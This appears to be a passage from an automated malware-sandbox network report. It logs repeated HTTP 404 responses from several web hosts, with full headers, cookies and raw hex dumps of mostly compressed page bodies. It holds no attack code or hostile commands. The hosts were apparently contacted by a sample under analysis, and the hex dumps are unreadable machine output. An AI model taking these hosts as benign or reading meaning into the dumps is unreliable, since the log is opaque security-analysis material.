Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 21 Jan 2025 14:05:51 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:05:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jeanandolive.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=j4GQoIzH.Q_zk9ZQ7Sd3axIsT_kCTYqzoKRL0KVPFhE-1737468358-1.0.1.1-2VXPKV68Sec3BCTjmzAx51Pa9kcQeu.t_tXJ5RDPCTuOpmKAGMdiA4.fWowXS18Ax5cW_2ekh1FIoZRp_L24hw; path=/; expires=Tue, 21-Jan-25 14:35:58 GMT; domain=.www.jeanandolive.net; HttpOnlySet-Cookie: _cfuvid=YqvR5S_GPxPrTL5Wq.YkhwvXk93Xo.UrcOd58qsk5bI-1737468358187-0.0.1.1-604800000; path=/; domain=.www.jeanandolive.net; HttpOnlyServer: cloudflareCF-RAY: 9057dcb55af3f5fa-EWRContent-Encoding: gzipData Raw: 32 36 38 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 72 e0 67 4d c4 fd 87 5a 4e 8c bb 29 a1 d0 78 f2 01 aa db bb 96 e5 08 5f dc de 6e 58 bb f6 ca da be 09 10 28 92 d0 e0 25 00 6c b2 87 6e ff f6 8b ac 2a bc 0b 0f 92 dd 1a 6f c4 aa 35 24 51 c8 ca cc ca cc ca 7a 67 7d fb 9b 7f fe c3 77 7f fa f1 8f df a3 5d 16 f8 0f ef be 85 2f e4 db e1 f6 7e 42 42 fc e7 1f 26 90 46 6c f7 e1 dd b7 01 c9 6c e4 ec ec 24 25 d9 fd e4 cf 7f fa 17 bc 98 e4 c9 a1 1d 90 fb c9 93 47 0e 71 94 64 13 e4 44 61 46 c2 ec 7e 72 f0 dc 6c 77 ef 92 27 cf 21 98 3e 48 c8 0b bd cc b3 7d 9c 3a b6 4f ee 55 40 e2 7b e1 27 94 10 ff 7e 12 27 d1 c6 f3 c9 04 ed 12 b2 b9 9f ec b2 2c b6 ee ee b6 41 bc 95 a3 64 7b 77 dc 84 77 6a 33 8b 17 6e d7 b6 f3 a9 91 e7 67 62 87 76 e8 46 be f7 44 e4 90 64 77 c7 c0 4f 62 47 8e 77 f1 e4 e1 5d 95 f1 9b 24 5a 47 59 7a 53 b0 Data Ascii: 268f}kFrgMZN)x_nX(%ln*o5$Qzg}w]/~BB&Fll$%GqdDaF~rlw'!>H}:OU@{'~',Ad{wwj3ngbvFDdwObGw]$ZGYzS
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jeanandolive.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=k.6kAsx8SPbMmHxFhqafLglWiShtkxnELjg3JncXl68-1737468360-1.0.1.1-bBWlYbdY3QXHjp2KfWFMYZMJXxfIXGd3QoCULq2rXheFqaTzWeEn.B_ICE8wgNaP46w4YXcCSaEJQluToxrrcw; path=/; expires=Tue, 21-Jan-25 14:36:00 GMT; domain=.www.jeanandolive.net; HttpOnlySet-Cookie: _cfuvid=WGVsdKN46JxCjjYFGWvy3x3QuZlIy6tIAAvSdSsb_EA-1737468360678-0.0.1.1-604800000; path=/; domain=.www.jeanandolive.net; HttpOnlyServer: cloudflareCF-RAY: 9057dcc52fb68c36-EWRContent-Encoding: gzipData Raw: 32 66 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 84 54 51 6f db 36 10 7e 8e 81 fd 07 f6 f6 e0 0d 93 c4 64 dd 80 41 b3 bc 14 5b f6 30 0c 4b 30 27 1b 8a 20 33 68 e9 2c 5d 4b 91 2c 79 b2 ec a6 fe ef 03 25 a7 f3 6a 14 79 22 f8 f1 bb ef 8e 1f 79 37 7b f1 cb f5 cf b7 af 6f ae 44 c3 ad 9e 4f 66 71 11 5a 99 ba 00 34 e9 dd 02 22 86 aa 9a 4f 66 2d b2 12 65 a3 7c 40 2e e0 ee f6 d7 f4 07 78 82 8d 6a b1 80 0d 61 ef ac 67 10 a5 35 8c 86 0b e8 a9 e2 a6 a8 70 43 25 a6 c3 26 11 64 88 49 e9 34 94 4a 63 71 11 45 34 99 b7 c2 a3 2e c0 79 bb 26 8d 20 1a 8f eb 02 1a 66 97 4b 59 b7 ae ce ac af e5 76 6d e4 c5 a7 21 64 ea 95 2a df 7e 12 f3 06 95 51 a6 b2 9a 36 98 19 64 b9 6d b5 77 65 e6 1a 07 f3 c9 71 e1 53 6f 57 96 c3 f4 63 d9 53 63 c9 54 b8 4d c4 da 6a 6d fb a9 90 f3 c9 d9 2c f0 4e e3 9c da 3a a7 f0 d5 7d a0 f7 18 0a 50 1d 5b 10 f4 90 88 11 f9 67 Data Ascii: 2f8TQo6~dA[0K0' 3h,]K,y%jy"y7{oDOfqZ4"Of-e\|@.xjag5pC%&dI4JcqE4.y& fKYvm!d*~Q6dmweqSoWcScTMjm,N:}P[g
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jeanandolive.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=swl783nXNfgsZmyZoYoV5oCewlUq2Ry5tNBUEMtZzbY-1737468363-1.0.1.1-QSAJz.2ckvpM1mqrShgZRiOMfwgEvzCpGo.xOute_SQhXc5Esz3fhtuWNx7i1FiO0stLdSVXWoKTJ70BbyUj9g; path=/; expires=Tue, 21-Jan-25 14:36:03 GMT; domain=.www.jeanandolive.net; HttpOnlySet-Cookie: _cfuvid=GaJVUp_4onB8B2iprJWuRYDUH79DdR.vcuW_3QmL2w8-1737468363233-0.0.1.1-604800000; path=/; domain=.www.jeanandolive.net; HttpOnlyServer: cloudflareCF-RAY: 9057dcd50ac143ad-EWRContent-Encoding: gzipData Raw: 32 66 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 84 54 51 6f db 36 10 7e 8e 81 fd 07 f6 f6 e0 0d 93 c4 64 dd 80 41 b3 bc 14 5b f6 30 0c 4b 30 27 1b 8a 20 33 68 e9 2c 5d 4b 91 2c 79 b2 ec a6 fe ef 03 25 a7 f3 6a 14 79 22 f8 f1 bb ef 8e 1f 79 37 7b f1 cb f5 cf b7 af 6f ae 44 c3 ad 9e 4f 66 71 11 5a 99 ba 00 34 e9 dd 02 22 86 aa 9a 4f 66 2d b2 12 65 a3 7c 40 2e e0 ee f6 d7 f4 07 78 82 8d 6a b1 80 0d 61 ef ac 67 10 a5 35 8c 86 0b e8 a9 e2 a6 a8 70 43 25 a6 c3 26 11 64 88 49 e9 34 94 4a 63 71 11 45 34 99 b7 c2 a3 2e c0 79 bb 26 8d 20 1a 8f eb 02 1a 66 97 4b 59 b7 ae ce ac af e5 76 6d e4 c5 a7 21 64 ea 95 2a df 7e 12 f3 06 95 51 a6 b2 9a 36 98 19 64 b9 6d b5 77 65 e6 1a 07 f3 c9 71 e1 53 6f 57 96 c3 f4 63 d9 53 63 c9 54 b8 4d c4 da 6a 6d fb a9 90 f3 c9 d9 2c f0 4e e3 9c da 3a a7 f0 d5 7d a0 f7 18 0a 50 1d 5b 10 f4 90 88 11 f9 67 Data Ascii: 2f8TQo6~dA[0K0' 3h,]K,y%jy"y7{oDOfqZ4"Of-e\|@.xjag5pC%&dI4JcqE4.y& fKYvm!d*~Q6dmweqSoWcScTMjm,N:}P[g
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sZj9pe%2FB7MtK9RaaR%2BbK5SX6hcB4qlenmrWmuEf%2FggRpNVROzWWHHkVeA0KOyESjttmYB6SwaDzD2566Xg9IBhtsPKqghkFlcEN%2FVJJdvURtHl%2F8wM5UHR6L1uxzeYcarKatCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd086bbe7c6a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1994&rtt_var=997&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 06 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 82 80 ba 85 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mc5xzyXO8sCLX99VctQ1fKzE6CjwDJekn2Rxz394vtqvvH7JP%2BlOsBbnuDv0yVXLcYhY57O1vLGNOPSuaoZNrKNgIgxJZqaE%2FkeD0tL27y4N5MW6Xq%2BoMPz4HwldMQneAdn49A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd189d3e8ca1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1952&min_rtt=1952&rtt_var=976&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 06 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 82 80 ba 85 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yp%2FHRQrBCfdCYM9BuIl3FazUb9oLmLEvFRxjOV%2B%2BR4fOp4rS9kX84VaG59N6P%2F4f16DH4IbzECqemB4IyPiutw92QSNKriWJVFV1L7SSRLS7LZPnGLZCVrhrBzvmYbufSoGcfA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd28edc5de95-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3252&min_rtt=3252&rtt_var=1626&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1811&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 06 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 82 80 ba 85 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9P4SV2GHbKdUlteIvH15mXzNBIhv2ijyPp2XhHNHedsWhV2jiiu6WHjTRhBQtnAnh4EeA4Liyl2%2BtwqsgnTdi%2FEM3GqsZzmXAwlleJCEVBK8z683%2FNZk6fdcjMRWDAgIo6lo8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd38ae6a7c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1914&min_rtt=1914&rtt_var=957&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=521&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:25 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000Access-Control-Allow-Origin: http://www.balivegasbaru2.xyzAccess-Control-Allow-Credentials: truecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=68vUARflquBSdXECA%2B7%2FwYefmODpAZ6MSmQAFyYpJN8C%2BpiMNAmUunGDpNOvuSQv7Xhn13b1%2BRRMTkGGti7ckqYxIUO1ihYMumR80YNZrqVipjl6xE%2Bo2MNAE4KSsjPncZbq3Otm9HMQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd5d5b7636bf-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=34631&min_rtt=34631&rtt_var=17315&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=789&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:27 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000Access-Control-Allow-Origin: http://www.balivegasbaru2.xyzAccess-Control-Allow-Credentials: truecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uii8Y2%2F27kGmGhEMERszixll%2FU2r7iHqW4jWtjLH3igK3Rs4QuGGiS8qhzGnE1LSo%2FJ9cl2xdQfCPaW90n3wdN%2FMgVpVaeZRqN7rsPHhW8Y1CYqFOr3o3VaU1Na2k%2BHEzVA3yJRCm7cX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd6cbc183a05-YYZalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=14226&min_rtt=14226&rtt_var=7113&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=809&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:30 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000Access-Control-Allow-Origin: http://www.balivegasbaru2.xyzAccess-Control-Allow-Credentials: truecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wJxplXz4KhI%2FB%2BcGs1WNnSYkB0lm0EgxpLpZszqjj4pjc3UiufyRr6zuwJKapmATNeHbu20rGjglXluAx0MjpN5%2FMwkmw16NDv%2FxFwhMohQwOZuf145IuMMUFL18%2FQeGl6R2iw9kt6E"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd7c8d116906-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8432&min_rtt=8432&rtt_var=4216&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1826&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:32 GMTTransfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=2592000cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxAQTrDQg56V2E6cuPK57hiji6YKAOb%2BfwIreN60ut2Zf%2FcpilzULDoyO5GxpLjcCzP2ryUZTqJl71DNNz9uGWz8kcYdnPHYFYAegxENANFnp9JFJmqmG0ztQf%2FGe0zcuYR0UwKcJ6RD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9057dd8ca956c988-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8533&min_rtt=8533&rtt_var=4266&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=526&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Jan 2025 14:06:38 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 30 Sep 2024 19:17:41 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@
